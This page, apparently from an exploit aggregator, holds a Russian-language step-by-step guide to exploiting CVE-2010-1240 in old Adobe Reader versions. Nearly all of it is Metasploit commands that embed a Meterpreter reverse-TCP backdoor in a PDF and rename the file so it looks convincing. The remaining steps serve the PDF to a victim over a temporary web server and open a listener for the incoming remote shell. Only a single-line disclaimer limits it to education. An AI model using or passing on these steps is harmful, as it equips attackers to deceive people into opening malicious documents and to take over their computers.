Sploitus

Exploit for CVE-2010-1240

kitploit · 2026-09-02

Exploit Code

MARKDOWN102 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ASEPSAEPDIN-CVE-2010-1240
# CVE-2010-1240 - Внедрение бэкдора в PDF

![](https://img.shields.io/badge/CVSS:2.0%20Score%20-9.3%20HIGH-red) ![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.11-blueviolet.svg) ![](https://img.shields.io/badge/Metasploitable%20-Yes-blue)

* * *

⚠️ _Только для образовательных и авторизованных исследовательских целей в области безопасности_

## Описание

Adobe Reader и Acrobat 9.x до 9.3.3, а также 8.x до 8.2.3 в Windows и Mac OS X не ограничивают содержимое одного текстового поля в диалоговом окне предупреждения Launch File, что облегчает удаленным злоумышленникам обманом заставить пользователей выполнить произвольную локальную программу, указанную в PDF-документе, как показано на примере текстового поля, утверждающего, что кнопка Open позволит пользователю прочитать зашифрованное сообщение.

## Демонстрация

![Анимация](https://assets.kitploit.com/production/public/readmes/22874/c724027c5e167d2bca3061fbd804d1e37754c24f3ba98584c6fa59456af1b9c2.gif)

## Пошаговые инструкции

  1. Сначала запустите msfconsole

root@kitploit:~
         
         msfconsole
         

  2. Затем установите полезную нагрузку для внедрения в PDF

root@kitploit:~
         
         use exploit/windows/fileformat/adobe_pdf_embedded_exe
         

  3. Установите параметр INFILENAME и укажите прямой путь к исходному PDF-файлу

root@kitploit:~
         
         set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
         

  4. Задайте имя новому вредоносному PDF-файлу, чтобы оно выглядело убедительнее, установив параметр FILENAME

root@kitploit:~
         
         set FILENAME laporan.pdf
         

  5. Найдите и внедрите полезную нагрузку в PDF-файл

root@kitploit:~
         
         set payload windows/meterpreter/reverse_tcp
         

  6. Установите параметр LHOST на IP-адрес атакующего

root@kitploit:~
         
         set LHOST 172.16.10.10
         

  7. Откройте новый терминал и перейдите в папку с вредоносным PDF-файлом

root@kitploit:~
         
         cd .msf4/local/
         

  8. Создайте временный сервер на Python

root@kitploit:~
         
         python -m http.server
         

  9. Загрузите вредоносный PDF-файл на машину жертвы

root@kitploit:~
         
         http://172.16.10.10:8000/certificate.pdf
         

  10. Перед запуском вредоносного PDF-файла на машине жертвы запустите слушатель в предыдущем терминале

root@kitploit:~
         
         use exploit/multi/handler
         set payload windows/meterpreter/reverse_tcp
         set LHOST 172.16.10.10
         exploit
         

  11. Как только вредоносный PDF-файл будет выполнен на машине жертвы, вы получите подключение к машине жертвы




## Благодарности

  * https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  * https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  * https://github.com/Jasmoon99/Embedded-PDF